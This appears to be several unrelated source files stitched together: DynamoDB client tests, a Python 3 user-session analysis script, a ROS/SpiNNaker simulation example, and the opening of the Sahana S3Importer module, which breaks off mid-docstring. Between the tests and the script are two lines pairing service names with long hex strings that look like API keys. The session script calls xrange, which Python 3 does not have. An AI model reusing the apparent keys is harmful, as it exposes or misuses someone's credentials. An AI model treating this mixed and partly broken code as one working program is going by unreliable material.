        self.dynamo.create_table("foobar", hash_key=hash_key)
        ret = self.dynamo.describe_table("foobar")
        assert ret is not None
        self.assertEqual(ret.item_count, ret["ItemCount"])
        with self.assertRaises(KeyError):
            self.assertIsNotNone(ret["Missing"])

    def test_magic_index_props(self):
        """Index can look up properties on response object"""
        index = GlobalIndex.all("idx-name", DynamoKey("id"))
        index.response = {"FooBar": 2}
        self.assertEqual(index["FooBar"], 2)
        with self.assertRaises(KeyError):
            self.assertIsNotNone(index["Missing"])

    def test_describe_during_delete(self):
        """Describing a table during a delete operation should not crash"""
        response = {
            "ItemCount": 0,
            "ProvisionedThroughput": {
                "NumberOfDecreasesToday": 0,
                "ReadCapacityUnits": 5,
                "WriteCapacityUnits": 5,
            },
            "TableName": "myTableName",
            "TableSizeBytes": 0,
            "TableStatus": "DELETING",
        }
        table = Table.from_response(response)
        self.assertEqual(table.status, "DELETING")

    def test_delete_missing(self):
        """Deleting a missing table returns False"""
        ret = self.dynamo.delete_table("foobar")
        self.assertTrue(not ret)

    def test_re_raise_passthrough(self):
        """DynamoDBError can re-raise itself if missing original exception"""
        err = DynamoDBError(400, Code="ErrCode", Message="Ouch", args={})
        caught = False
        try:
            err.re_raise()
        except DynamoDBError as e:
            caught = True
            self.assertEqual(err, e)
        self.assertTrue(caught)

    def test_re_raise(self):
        """DynamoDBError can re-raise itself with stacktrace of original exc"""
        caught = False
        try:
            try:
                raise Exception("Hello")
            except Exception as e1:
                err = DynamoDBError(
                    400,
                    Code="ErrCode",
                    Message="Ouch",
                    args={},
                    exc_info=sys.exc_info(),
                )
                err.re_raise()
        except DynamoDBError as e:
            caught = True
            import traceback

            tb = traceback.format_tb(e.__traceback__)
            self.assertIn("Hello", tb[-1])
            self.assertEqual(e.status_code, 400)
        self.assertTrue(caught)

    def test_default_return_capacity(self):
        """When default_return_capacity=True, always return capacity"""
        self.dynamo.default_return_capacity = True
        with patch.object(self.dynamo, "call") as call:
            call().get.return_value = None
            rs = self.dynamo.scan("foobar")
            list(rs)
        call.assert_called_with(
            "scan",
            TableName="foobar",
            ReturnConsumedCapacity="INDEXES",
            ConsistentRead=False,
        )

    def test_list_tables_page(self):
        """Call to ListTables should page results"""
        hash_key = DynamoKey("id")
        for i in range(120):
            self.dynamo.create_table("table%d" % i, hash_key=hash_key)
        tables = list(self.dynamo.list_tables(110))
        self.assertEqual(len(tables), 110)

    def test_limit_complete(self):
        """A limit with item_capacity = 0 is 'complete'"""
        limit = Limit(item_limit=0)
        self.assertTrue(limit.complete)

    def test_wait_create_table(self):
        """Create table shall wait for the table to come online."""
        tablename = "foobar_wait"
        hash_key = DynamoKey("id")
        self.dynamo.create_table(tablename, hash_key=hash_key, wait=True)
        self.assertIsNotNone(self.dynamo.describe_table(tablename))

    def test_wait_delete_table(self):
        """Delete table shall wait for the table to go offline."""
        tablename = "foobar_wait"
        hash_key = DynamoKey("id")
        self.dynamo.create_table(tablename, hash_key=hash_key, wait=True)
        result = self.dynamo.delete_table(tablename, wait=True)
        self.assertTrue(result)


class TestDataTypes(BaseSystemTest):

    """Tests for Dynamo data types"""

    def make_table(self):
        """Convenience method for making a table"""
        hash_key = DynamoKey("id")
        self.dynamo.create_table("foobar", hash_key=hash_key)

    def test_string(self):
        """Store and retrieve a string"""
        self.make_table()
        self.dynamo.put_item("foobar", {"id": "abc"})
        item = list(self.dynamo.scan("foobar"))[0]
        self.assertEqual(item["id"], "abc")
        self.assertTrue(isinstance(item["id"], str))

    def test_int(self):
        """Store and retrieve an int"""
        self.make_table()
        self.dynamo.put_item("foobar", {"id": "a", "num": 1})
        item = list(self.dynamo.scan("foobar"))[0]
        self.assertEqual(item["num"], 1)

    def test_float(self):
        """Store and retrieve a float"""
        self.make_table()
        self.dynamo.put_item("foobar", {"id": "a", "num": 1.1})
        item = list(self.dynamo.scan("foobar"))[0]
        self.assertAlmostEqual(float(item["num"]), 1.1)

    def test_decimal(self):
        """Store and retrieve a Decimal"""
        self.make_table()
        self.dynamo.put_item("foobar", {"id": "a", "num": Decimal("1.1")})
        item = list(self.dynamo.scan("foobar"))[0]
        self.assertEqual(item["num"], Decimal("1.1"))

    def test_binary(self):
        """Store and retrieve a binary"""
        self.make_table()
        self.dynamo.put_item("foobar", {"id": "a", "data": Binary("abc")})
        item = list(self.dynamo.scan("foobar"))[0]
        self.assertEqual(item["data"].value, b"abc")

    def test_binary_bytes(self):
        """Store and retrieve bytes as a binary"""
        self.make_table()
        data = {"a": 1, "b": 2}
        self.dynamo.put_item("foobar", {"id": "a", "data": Binary(dumps(data))})
        item = list(self.dynamo.scan("foobar"))[0]
        self.assertEqual(loads(item["data"].value), data)

    def test_string_set(self):
        """Store and retrieve a string set"""
        self.make_table()
        item = {
            "id": "a",
            "datas": set(["a", "b"]),
        }
        self.dynamo.put_item("foobar", item)
        ret = list(self.dynamo.scan("foobar"))[0]
        self.assertEqual(ret, item)

    def test_number_set(self):
        """Store and retrieve a number set"""
        self.make_table()
        item = {
            "id": "a",
            "datas": set([1, 2, 3]),
        }
        self.dynamo.put_item("foobar", item)
        ret = list(self.dynamo.scan("foobar"))[0]
        self.assertEqual(ret, item)

    def test_binary_set(self):
        """Store and retrieve a binary set"""
        self.make_table()
        item = {
            "id": "a",
            "datas": set([Binary("a"), Binary("b")]),
        }
        self.dynamo.put_item("foobar", item)
        ret = list(self.dynamo.scan("foobar"))[0]
        self.assertEqual(ret, item)

    def test_binary_equal(self):
        """Binary should eq other Binaries and also raw bytestrings"""
        self.assertEqual(Binary("a"), Binary("a"))
        self.assertEqual(Binary("a"), b"a")
        self.assertFalse(Binary("a") != Binary("a"))

    def test_binary_repr(self):
        """Binary repr should wrap the contained value"""
        self.assertEqual(repr(Binary("a")), "Binary(%r)" % b"a")

    def test_binary_converts_unicode(self):
        """Binary will convert unicode to bytes"""
        b = Binary("a")
        self.assertTrue(isinstance(b.value, bytes))

    def test_binary_force_string(self):
        """Binary must wrap a string type"""
        with self.assertRaises(TypeError):
            Binary(2)  # type: ignore

    def test_bool(self):
        """Store and retrieve a boolean"""
        self.make_table()
        self.dynamo.put_item("foobar", {"id": "abc", "b": True})
        item = list(self.dynamo.scan("foobar"))[0]
        self.assertEqual(item["b"], True)
        self.assertTrue(isinstance(item["b"], bool))

    def test_list(self):
        """Store and retrieve a list"""
        self.make_table()
        self.dynamo.put_item("foobar", {"id": "abc", "l": ["a", 1, False]})
        item = list(self.dynamo.scan("foobar"))[0]
        self.assertEqual(item["l"], ["a", 1, False])

    def test_dict(self):
        """Store and retrieve a dict"""
        self.make_table()
        data = {
            "i": 1,
            "s": "abc",
            "n": None,
            "l": ["a", 1, True],
            "b": False,
        }
        self.dynamo.put_item("foobar", {"id": "abc", "d": data})
        item = list(self.dynamo.scan("foobar"))[0]
        self.assertEqual(item["d"], data)

    def test_nested_dict(self):
        """Store and retrieve a nested dict"""
        self.make_table()
        data = {
            "s": "abc",
            "d": {
                "i": 42,
            },
        }
        self.dynamo.put_item("foobar", {"id": "abc", "d": data})
        item = list(self.dynamo.scan("foobar"))[0]
        self.assertEqual(item["d"], data)

    def test_nested_list(self):
        """Store and retrieve a nested list"""
        self.make_table()
        data = [
            1,
            [
                True,
                None,
                "abc",
            ],
        ]
        self.dynamo.put_item("foobar", {"id": "abc", "l": data})
        item = list(self.dynamo.scan("foobar"))[0]
        self.assertEqual(item["l"], data)

    def test_unrecognized_type(self):
        """Dynamizer throws error on unrecognized type"""
        value = {
            "ASDF": "abc",
        }
        with self.assertRaises(TypeError):
            self.dynamo.dynamizer.decode(value)


class TestDynamizer(unittest.TestCase):

    """Tests for the Dynamizer"""

    def test_register_encoder(self):
        """Can register a custom encoder"""
        from datetime import datetime

        dynamizer = Dynamizer()
        dynamizer.register_encoder(datetime, lambda d, v: (STRING, v.isoformat()))
        now = datetime.utcnow()
        self.assertEqual(dynamizer.raw_encode(now), (STRING, now.isoformat()))

    def test_encoder_missing(self):
        """If no encoder is found, raise ValueError"""
        from datetime import datetime

        dynamizer = Dynamizer()
        with self.assertRaises(ValueError):
            dynamizer.encode(datetime.utcnow())


class TestResultModels(unittest.TestCase):

    """Tests for the model classes in results.py"""

    def test_add_dicts_base_case(self):
        """add_dict where one argument is None returns the other"""
        f = object()
        self.assertEqual(add_dicts(f, None), f)
        self.assertEqual(add_dicts(None, f), f)

    def test_add_dicts(self):
        """Merge two dicts of values together"""
        a = {
            "a": 1,
            "b": 2,
        }
        b = {
            "a": 3,
            "c": 4,
        }
        ret = add_dicts(a, b)
        self.assertEqual(
            ret,
            {
                "a": 4,
                "b": 2,
                "c": 4,
            },
        )

    def test_count_repr(self):
        """Count repr"""
        count = Count(0, 0)
        self.assertEqual(repr(count), "Count(0)")

    def test_count_addition(self):
        """Count addition"""
        count = Count(4, 2)
        self.assertEqual(count + 5, 9)

    def test_count_subtraction(self):
        """Count subtraction"""
        count = Count(4, 2)
        self.assertEqual(count - 2, 2)

    def test_count_multiplication(self):
        """Count multiplication"""
        count = Count(4, 2)
        self.assertEqual(2 * count, 8)

    def test_count_division(self):
        """Count division"""
        count = Count(4, 2)
        self.assertEqual(count / 2, 2)

    def test_count_add_none_capacity(self):
        """Count addition with one None consumed_capacity"""
        cap = Capacity(3, 0)
        count = Count(4, 2)
        count2 = Count(5, 3, cap)
        ret = count + count2
        self.assertEqual(ret, 9)
        self.assertEqual(ret.scanned_count, 5)
        self.assertEqual(ret.consumed_capacity, cap)

    def test_count_add_capacity(self):
        """Count addition with consumed_capacity"""
        count = Count(4, 2, Capacity(3, 0))
        count2 = Count(5, 3, Capacity(2, 0))
        ret = count + count2
        self.assertEqual(ret, 9)
        self.assertEqual(ret.scanned_count, 5)
        self.assertEqual(ret.consumed_capacity.read, 5)

    def test_capacity_math(self):
        """Capacity addition and equality"""
        cap = Capacity(2, 4)
        s = set([cap])
        self.assertIn(Capacity(2, 4), s)
        self.assertNotEqual(Capacity(1, 4), cap)
        self.assertEqual(Capacity(1, 1) + Capacity(2, 2), Capacity(3, 3))

    def test_capacity_format(self):
        """String formatting for Capacity"""
        c = Capacity(1, 3)
        self.assertEqual(str(c), "R:1.0 W:3.0")
        c = Capacity(0, 0)
        self.assertEqual(str(c), "0")

    def test_total_consumed_capacity(self):
        """ConsumedCapacity can parse results with only Total"""
        response = {
            "TableName": "foobar",
            "ReadCapacityUnits": 4,
            "WriteCapacityUnits": 5,
        }
        cap = ConsumedCapacity.from_response(response)
        self.assertEqual(cap.total, (4, 5))
        self.assertIsNone(cap.table_capacity)

    def test_consumed_capacity_equality(self):
        """ConsumedCapacity addition and equality"""
        cap = ConsumedCapacity(
            "foobar",
            Capacity(0, 10),
            Capacity(0, 2),
            {
                "l-index": Capacity(0, 4),
            },
            {
                "g-index": Capacity(0, 3),
            },
        )
        c2 = ConsumedCapacity(
            "foobar",
            Capacity(0, 10),
            Capacity(0, 2),
            {
                "l-index": Capacity(0, 4),
                "l-index2": Capacity(0, 7),
            },
        )

        self.assertNotEqual(cap, c2)
        c3 = ConsumedCapacity(
            "foobar",
            Capacity(0, 10),
            Capacity(0, 2),
            {
                "l-index": Capacity(0, 4),
            },
            {
                "g-index": Capacity(0, 3),
            },
        )
        self.assertIn(cap, set([c3]))
        combined = cap + c2
        self.assertEqual(
            cap + c2,
            ConsumedCapacity(
                "foobar",
                Capacity(0, 20),
                Capacity(0, 4),
                {
                    "l-index": Capacity(0, 8),
                    "l-index2": Capacity(0, 7),
                },
                {
                    "g-index": Capacity(0, 3),
                },
            ),
        )
        self.assertIn(str(Capacity(0, 3)), str(combined))

    def test_add_different_tables(self):
        """Cannot add ConsumedCapacity of two different tables"""
        c1 = ConsumedCapacity("foobar", Capacity(1, 28))
        c2 = ConsumedCapacity("boofar", Capacity(3, 0))
        with self.assertRaises(TypeError):
            c1 += c2

    def test_always_continue_query(self):
        """Regression test.
        If result has no items but does have LastEvaluatedKey, keep querying.
        """
        conn = MagicMock()
        conn.dynamizer.decode_keys.side_effect = lambda x: x
        items = ["a", "b"]
        results = [
            {"Items": [], "LastEvaluatedKey": {"foo": 1, "bar": 2}},
            {"Items": [], "LastEvaluatedKey": {"foo": 1, "bar": 2}},
            {"Items": items},
        ]
        conn.call.side_effect = lambda *_, **__: results.pop(0)
        rs = ResultSet(conn, Limit())
        results = list(rs)
        self.assertEqual(results, items)


class TestHooks(BaseSystemTest):

    """Tests for connection callback hooks"""

    def tearDown(self):
        super(TestHooks, self).tearDown()
        for hooks in self.dynamo._hooks.values():
            while hooks:
                hooks.pop()

    def test_precall(self):
        """precall hooks are called before an API call"""
        hook = MagicMock()
        self.dynamo.subscribe("precall", hook)

        def throw(**_):
            """Throw an exception to terminate the request"""
            raise Exception()

        with patch.object(self.dynamo, "client") as client:
            client.describe_table.side_effect = throw
            with self.assertRaises(Exception):
                self.dynamo.describe_table("foobar")
        hook.assert_called_with(self.dynamo, "describe_table", {"TableName": "foobar"})

    def test_postcall(self):
        """postcall hooks are called after API call"""
        hash_key = DynamoKey("id")
        self.dynamo.create_table("foobar", hash_key=hash_key)
        calls = []

        def hook(*args):
            """Log the call into a list"""
            calls.append(args)

        self.dynamo.subscribe("postcall", hook)
        self.dynamo.describe_table("foobar")
        self.assertEqual(len(calls), 1)
        args = calls[0]
        self.assertEqual(len(args), 4)
        conn, command, kwargs, response = args
        self.assertEqual(conn, self.dynamo)
        self.assertEqual(command, "describe_table")
        self.assertEqual(kwargs["TableName"], "foobar")
        self.assertEqual(response["Table"]["TableName"], "foobar")

    def test_capacity(self):
        """capacity hooks are called whenever response has ConsumedCapacity"""
        hash_key = DynamoKey("id")
        self.dynamo.create_table("foobar", hash_key=hash_key)
        hook = MagicMock()
        self.dynamo.subscribe("capacity", hook)
        with patch.object(self.dynamo, "client") as client:
            client.scan.return_value = {
                "Items": [],
                "ConsumedCapacity": {
                    "TableName": "foobar",
                    "ReadCapacityUnits": 4,
                },
            }
            rs = self.dynamo.scan("foobar")
            list(rs)
        cap = ConsumedCapacity("foobar", Capacity(4, 0))
        hook.assert_called_with(self.dynamo, "scan", ANY, ANY, cap)

    def test_subscribe(self):
        """Can subscribe and unsubscribe from hooks"""
        hook = lambda: None
        self.dynamo.subscribe("precall", hook)
        self.assertEqual(len(self.dynamo._hooks["precall"]), 1)
        self.dynamo.unsubscribe("precall", hook)
        self.assertEqual(len(self.dynamo._hooks["precall"]), 0)

Alchemy sentiment analysis: fb12d2c55fff36e1e268584e261b6b010b37279f



Africa Is Talking: 676dbd926bbb04fa69ce90ee81d3f5ffee2692aaf80eb5793bd70fe93e77dc2e

#!/usr/bin/env python3
"""
    Categorize and analyze user sessions.
    Read in ecfs_obfuscated_filtered.gz file, output some fancy results. 
"""

from collections import defaultdict
from collections import Counter
import sys
import time
import os
import resource
import json
import fnmatch
from pipes import Pipes
import operator

from operation import Operation

KB = 1024
MB = KB * 1024
GB = MB * 1024
TB = GB * 1024
PB = TB * 1024

MONITOR_LINES = 100000


class UserSession():
    def __init__(self, user_id):
        self.user_id = user_id
        self.from_ts = 0
        self.till_ts = 0
        self.get_requests = 0
        self.reget_requests = 0
        self.put_requests = 0
        self.get_bytes = 0
        self.put_bytes = 0
        self.rename_requests = 0
        self.del_requests = 0
        self.get_dirs = 0
        self.put_dirs = 0
        self.put_files_per_dir = 0.0
        self.get_files_per_dir = 0.0
        self.window_seconds = 0

        self.file_cnt_gets = Counter()
        self.file_cnt_puts = Counter()
        self.dir_cnt_gets = Counter()
        self.dir_cnt_puts = Counter()

        self.num_ops = 0
        self.last_ts = 0

    def add_op(self, op):
        self.num_ops += 1

        if op.ts < self.last_ts:
            raise Exception("Timestamp too old")
        else:
            self.last_ts = op.ts

        if op.optype == 'g':
            self.get_requests += 1
            self.get_bytes += op.size
            self.file_cnt_gets[op.obj_id] += 1
            self.dir_cnt_gets[op.parent_dir_id] += 1
        elif op.optype == 'p':
            self.put_requests += 1
            self.put_bytes += op.size
            self.file_cnt_puts[op.obj_id] += 1
            self.dir_cnt_puts[op.parent_dir_id] += 1
        elif op.optype == 'd':
            self.del_requests += 1
        elif op.optype == 'r':
            self.rename_requests += 1

        #update last time stamp in the session
        self.till_ts = op.ts + op.execution_time

    def finish(self):
        self.get_dirs = len(self.dir_cnt_gets)
        if self.get_dirs > 0:
            self.get_files_per_dir = float(self.get_requests) / self.get_dirs

        self.put_dirs = len(self.dir_cnt_puts)
        if self.put_dirs > 0:
            self.put_files_per_dir = float(self.put_requests) / self.put_dirs

        """
        set reget_counter
        :param counter: contains [ 1, 1, 5] counts of objects. value > 1 is a re-retrieval.
        :return:
        """
        for c in self.file_cnt_gets.values():
            if c > 1:
                self.reget_requests += (c - 1)

        # self.announce()

        return ";".join([str(x) for x in [
        self.user_id,
        self.from_ts,
        self.till_ts,
        self.till_ts - self.from_ts,
        self.get_requests,
        self.reget_requests,
        self.put_requests,
        self.get_bytes,
        self.put_bytes,
        self.rename_requests,
        self.del_requests,
        self.get_dirs,
        self.put_dirs,
        self.put_files_per_dir,
        self.get_files_per_dir,
        self.window_seconds
        ]]
        )


    def announce(self):
        print("closed session. gets: %r, regets: %r, puts: %r, dels: %r, renames: %r get_dirs: %r, put_dirs: %r, get_bytes: %r put_bytes: %r window_seconds: %d" % \
              (self.get_requests, self.reget_requests, self.put_requests, self.del_requests, self.rename_requests, self.get_dirs, self.put_dirs, self.get_bytes, self.put_bytes, self.window_seconds))


def find_clusters(atimes):
    foo = Counter()
    bar = dict()
    for i in xrange(120, 3660, 10):
        clusters = get_clusters(atimes, i)
        cs = len(clusters)
        foo[cs] += 1

        # note first occurance of this cluster size.
        if cs not in bar:
            bar[cs] = i
        # print(len(atimes), i, cs)

    return bar[foo.most_common()[0][0]]

def get_clusters(data, maxgap):
    '''Arrange data into groups where successive elements
       differ by no more than *maxgap*

        >>> cluster([1, 6, 9, 100, 102, 105, 109, 134, 139], maxgap=10)
        [[1, 6, 9], [100, 102, 105, 109], [134, 139]]

        >>> cluster([1, 6, 9, 99, 100, 102, 105, 134, 139, 141], maxgap=10)
        [[1, 6, 9], [99, 100, 102, 105], [134, 139, 141]]
    '''
    data.sort()
    groups = [[data[0]]]
    for x in data[1:]:
        if abs(x - groups[-1][-1]) <= maxgap:
            groups[-1].append(x)
        else:
            groups.append([x])
    return groups


def analyze_user_session(user_session_file, out_pipeline, target_file_name):
    with open(user_session_file, 'r') as sf:
        ops = list()
        atimes = list()

        for line in sf:
            op = Operation()
            op.init(line.strip())
            ops.append(op)
            atimes.append(op.ts)

        ops.sort(key=operator.attrgetter('ts'))
        atimes.sort()
        window_seconds = find_clusters(atimes)

        session_counter = 1

        uf = os.path.basename(user_session_file)
        user_id = uf[:uf.find(".user_session.csv")]

        session = UserSession(user_id)
        session.window_seconds = window_seconds

        for op in ops:
            if session.from_ts == 0:
                    session.from_ts = op.ts
                    session.till_ts = op.ts + op.execution_time

            if (session.till_ts + window_seconds) < op.ts:
                # this session is over, so archive it.
                out_pipeline.write_to(target_file_name, session.finish())
                del session
                session = UserSession(user_id)
                session.window_seconds = window_seconds
                session_counter += 1
            
            session.add_op(op)

        if session.num_ops > 0:
            out_pipeline.write_to(target_file_name, session.finish())

        print("sessions: %d with window_seconds: %d" %(session_counter, window_seconds))


if __name__ == "__main__":
    source_dir = os.path.abspath(sys.argv[1])


    result = os.path.abspath(sys.argv[2])
    results_dir = os.path.dirname(result)
    target_file_name = os.path.basename(result)

    users_session_files = [os.path.join(dirpath, f)
        for dirpath, dirnames, files in os.walk(source_dir)
        for f in fnmatch.filter(files, '*.user_session.csv')]

    #remove the old log file, as outpipe is append only.
    if os.path.exists(os.path.join(results_dir, target_file_name)):
        os.remove(os.path.join(results_dir, target_file_name))

    out_pipe = Pipes(results_dir)
    
    csv_header = ";".join(["user_id",
                    "from_ts",
                    "till_ts",
                    "session_lifetime",
                    "get_requests",
                    "reget_requests",
                    "put_requests",
                    "get_bytes",
                    "put_bytes",
                    "rename_requests",
                    "del_requests",
                    "get_dirs",
                    "put_dirs",
                    "put_files_per_dir",
                    "get_files_per_dir",
                    "window_seconds"
                    ])

    out_pipe.write_to(target_file_name, csv_header)

    cnt = 0
    for sf in users_session_files:
        cnt += 1
        print ("working on %d/%d" % (cnt, len(users_session_files)))
        analyze_user_session(sf, out_pipe, target_file_name)

        # if cnt >=20:
        #     break

    out_pipe.close()

    print("wrote results to %s: " % (os.path.join(results_dir, target_file_name)))
    
    
#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
@author Stephan Reith
@date 	31.08.2016

This is a simple example to demonstrate how the ROS Spinnaker Interface can be used.

You will also need a ROS Listener and a ROS Talker to send and receive data.
Make sure they communicate over the same ROS topics and std_msgs.Int64 ROS Messages used in here.
"""

import spynnaker.pyNN as pynn

from ros_spinnaker_interface import ROS_Spinnaker_Interface
# import transfer_functions as tf
from ros_spinnaker_interface import SpikeSourcePoisson
from ros_spinnaker_interface import SpikeSinkSmoothing


ts = 0.1
n_neurons = 1
simulation_time = 10000  # ms


pynn.setup(timestep=ts, min_delay=ts, max_delay=2.0*ts)


pop = pynn.Population(size=n_neurons, cellclass=pynn.IF_curr_exp, cellparams={}, label='pop')


# The ROS_Spinnaker_Interface just needs to be initialised. The following parameters are possible:
ros_interface = ROS_Spinnaker_Interface(
        n_neurons_source=n_neurons,                 # number of neurons of the injector population
        Spike_Source_Class=SpikeSourcePoisson,   # the transfer function ROS Input -> Spikes you want to use.
        Spike_Sink_Class=SpikeSinkSmoothing,     # the transfer function Spikes -> ROS Output you want to use.
                                                    # You can choose from the transfer_functions module
                                                    # or write one yourself.
        output_population=pop,                      # the pynn population you wish to receive the
                                                    # live spikes from.
        ros_topic_send='to_spinnaker',              # the ROS topic used for the incoming ROS values.
        ros_topic_recv='from_spinnaker',            # the ROS topic used for the outgoing ROS values.
        clk_rate=1000,                              # mainloop clock (update) rate in Hz.
        ros_output_rate=10)                         # number of ROS messages send out per second.

# Build your network, run the simulation and optionally record the spikes and voltages.
pynn.Projection(ros_interface, pop, pynn.OneToOneConnector(weights=5, delays=1))


pop.record()
pop.record_v()

pynn.run(simulation_time)

spikes = pop.getSpikes()

pynn.end()

# Plot
import pylab

spike_times = [spike[1] for spike in spikes]
spike_ids = [spike[0] for spike in spikes]

pylab.plot(spike_times, spike_ids, ".")
pylab.xlabel('Time (ms)')
pylab.ylabel('Neuron ID')
pylab.title('Spike Plot')
pylab.xlim(xmin=0)
pylab.show()

# -*- coding: utf-8 -*-

""" Resource Import Tools

    @copyright: 2011-12 (c) Sahana Software Foundation
    @license: MIT

    Permission is hereby granted, free of charge, to any person
    obtaining a copy of this software and associated documentation
    files (the "Software"), to deal in the Software without
    restriction, including without limitation the rights to use,
    copy, modify, merge, publish, distribute, sublicense, and/or sell
    copies of the Software, and to permit persons to whom the
    Software is furnished to do so, subject to the following
    conditions:

    The above copyright notice and this permission notice shall be
    included in all copies or substantial portions of the Software.

    THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
    EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
    OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
    NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
    HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
    WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
    FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
    OTHER DEALINGS IN THE SOFTWARE.
"""

# @todo: remove all interactive error reporting out of the _private methods, and raise exceptions instead.
__all__ = ["S3Importer", "S3ImportJob", "S3ImportItem"]

import os
import sys
import cPickle
import tempfile
from datetime import datetime
from copy import deepcopy
try:
    from cStringIO import StringIO    # Faster, where available
except:
    from StringIO import StringIO

try:
    from lxml import etree
except ImportError:
    print >> sys.stderr, "ERROR: lxml module needed for XML handling"
    raise

try:
    import json # try stdlib (Python 2.6)
except ImportError:
    try:
        import simplejson as json # try external module
    except:
        import gluon.contrib.simplejson as json # fallback to pure-Python module

from gluon import *
from gluon.serializers import json as jsons
from gluon.storage import Storage, Messages
from gluon.tools import callback

from s3utils import SQLTABLES3
from s3crud import S3CRUD
from s3xml import S3XML
from s3utils import s3_mark_required, s3_has_foreign_key, s3_get_foreign_key

DEBUG = False
if DEBUG:
    print >> sys.stderr, "S3IMPORTER: DEBUG MODE"
    def _debug(m):
        print >> sys.stderr, m
else:
    _debug = lambda m: None

# =============================================================================
class S3Importer(S3CRUD):
    """
        Transformable formats (XML, JSON, CSV) import handler
    """

    UPLOAD_TABLE_NAME = "s3_import_upload"

    # -------------------------------------------------------------------------
    def apply_method(self, r, **attr):
        """
            Apply CRUD methods

            @param r: the S3Request
            @param attr: dictionary of parameters for the method handler

            @returns: output object to send to the view

            Known means of communicating with this module:

            It expects a URL of the form: /prefix/name/import

            It will interpret the http requests as follows:

            GET     will trigger the upload
            POST    will trigger either commits or display the import details
            DELETE  will trigger deletes

            It will accept one of the following control vars:
            item:   to specify a single item in the import job
            job:    to specify a job
            It should not receive both so job takes precedent over item

            For CSV imports, the calling controller can add extra fields
            to the upload form to add columns to each row in the CSV. To add
            the extra fields, pass a named parameter "csv_extra_fields" to the
            s3_rest_controller call (or the S3Request call, respectively):

            s3_rest_controller(module, resourcename,
                               csv_extra_fields=[
                                    dict(label="ColumnLabelInTheCSV",
                                         field=field_instance)
                               ])

            The Field instance "field" will be added to the upload form, and
            the user input will be added to each row of the CSV under the
            label as specified. If the "field" validator has options, the
            input value will be translated into the option representation,
            otherwise the value will be used as-is.

            Note that the "label" in the dict is the column label in the CSV,
            whereas the field label for the form is to be set in the Field
            instance passed as "field".

            You can add any arbitrary number of csv_extra_fields to the list.

            Additionally, you may want to allow the user to choose whether
            the import shall first remove all existing data in the target
            table. To do so, pass a label for the "replace_option" to the
            request:

            s3_rest_controller(module, resourcename,
                               replace_option=T("Remove existing data before import"))

            This will add the respective checkbox to the upload form.

            You may also want to provide a link to download a CSV template from
            the upload form. To do that, add the resource name to the request
            attributes:

            s3_rest_controller(module, resourcename,
                               csv_template="<resourcename>")

            This will provide a link to:
                - static/formats/s3csv/<controller>/<resourcename>.csv
            at the top of the upload form.

        """

        _debug("S3Importer.apply_method(%s)" % r)

        # Messages
        T = current.T
        messages = self.messages = Messages(T)
        messages.download_template = "Download Template"
        messages.invalid_file_format = "Invalid File Format"
        messages.unsupported_file_type = "Unsupported file type of %s"
        messages.stylesheet_not_found = "No Stylesheet %s could be found to manage the import file."
        messages.no_file = "No file submitted"
        messages.file_open_error = "Unable to open the file %s"
        messages.file_not_found = "The file to upload is missing"
        messages.no_records_to_import = "No records to import"
        messages.no_job_to_delete = "No job to delete, maybe it has already been deleted."
        messages.title_job_read = "Details of the selected import job"
        messages.title_job_list = "List of import items"
        messages.file_uploaded = "Import file uploaded"
        messages.upload_submit_btn = "Upload Data File"
        messages.open_btn = "Open"
        messages.view_btn = "View"
        messages.delete_btn = "Delete"
        messages.item_show_details = "Display Details"
        messages.job_total_records = "Total records in the Import Job"
        messages.job_records_selected = "Records selected"
        messages.job_deleted = "Import job deleted"
        messages.job_completed = "Job run on %s. With result of (%s)"
        messages.import_file = "Import File"
        messages.import_file_comment = "Upload a file formatted according to the Template."
        messages.user_name = "User Name"
        messages.commit_total_records_imported = "%s records imported"
        messages.commit_total_records_ignored = "%s records ignored"
        messages.commit_total_errors = "%s records in error"

        try:
            self.uploadTitle = current.response.s3.crud_strings[self.tablename].title_upload
        except:
            self.uploadTitle = T("Upload a %s import file" % r.function)

        # @todo: correct to switch this off for the whole session?
        current.session.s3.ocr_enabled = False

        # Reset all errors/warnings
        self.error = None
        self.warning = None

        # CSV upload configuration
        if "csv_stylesheet" in attr:
            self.csv_stylesheet = attr["csv_stylesheet"]
        else:
            self.csv_stylesheet = None
        self.csv_extra_fields = None
        self.csv_extra_data = None

        # Environment
        self.controller = r.controller
        self.function = r.function

        # Target table for the data import
        self.controller_resource = self.resource
        self.controller_table = self.table
        self.controller_tablename = self.tablename

        # Table for uploads
        self.__define_table()
        self.upload_resource = None
        self.item_resource = None

        # XSLT Path
        self.xslt_path = os.path.join(r.folder, r.XSLT_PATH)
        self.xslt_extension = r.XSLT_EXTENSION

        # Check authorization
        authorised = self.permit("create", self.upload_tablename) and \
                     self.permit("create", self.controller_tablename)
        if not authorised:
            if r.method is not None:
                r.unauthorised()
            else:
                return dict(form=None)

        # @todo: clean this up
        source = None
        transform = None
        upload_id = None
        items = None
        # @todo get the data from either get_vars or post_vars appropriately
        #       for post -> commit_items would need to add the uploadID
        if "transform" in r.get_vars:
            transform = r.get_vars["transform"]
        if "filename" in r.get_vars:
            source = r.get_vars["filename"]
        if "job" in r.post_vars:
            upload_id = r.post_vars["job"]
        elif "job" in r.get_vars:
            upload_id = r.get_vars["job"]
        items = self._process_item_list(upload_id, r.vars)
        if "delete" in r.get_vars:
            r.http = "DELETE"

        # If we have an upload ID, then get upload and import job
        self.upload_id = upload_id
        query = (self.upload_table.id == upload_id)
        self.upload_job = current.db(query).select(limitby=(0, 1)).first()
        if self.upload_job:
            self.job_id = self.upload_job.job_id
        else:
            self.job_id = None

        # Now branch off to the appropriate controller function
        if r.http == "GET":
            if source != None:
                self.commit(source, transform)
                output = self.upload(r, **attr)
            if upload_id != None:
                output = self.display_job(upload_id)
            else:
                output = self.upload(r, **attr)
        elif r.http == "POST":
            if items != None:
                output = self.commit_items(upload_id, items)
            else:
                output = self.generate_job(r, **attr)
        elif r.http == "DELETE":
            if upload_id != None:
                output = self.delete_job(upload_id)
        else:
            r.error(405, current.manager.ERROR.BAD_METHOD)

        return output

    # -------------------------------------------------------------------------
    def upload(self, r, **attr):
        """
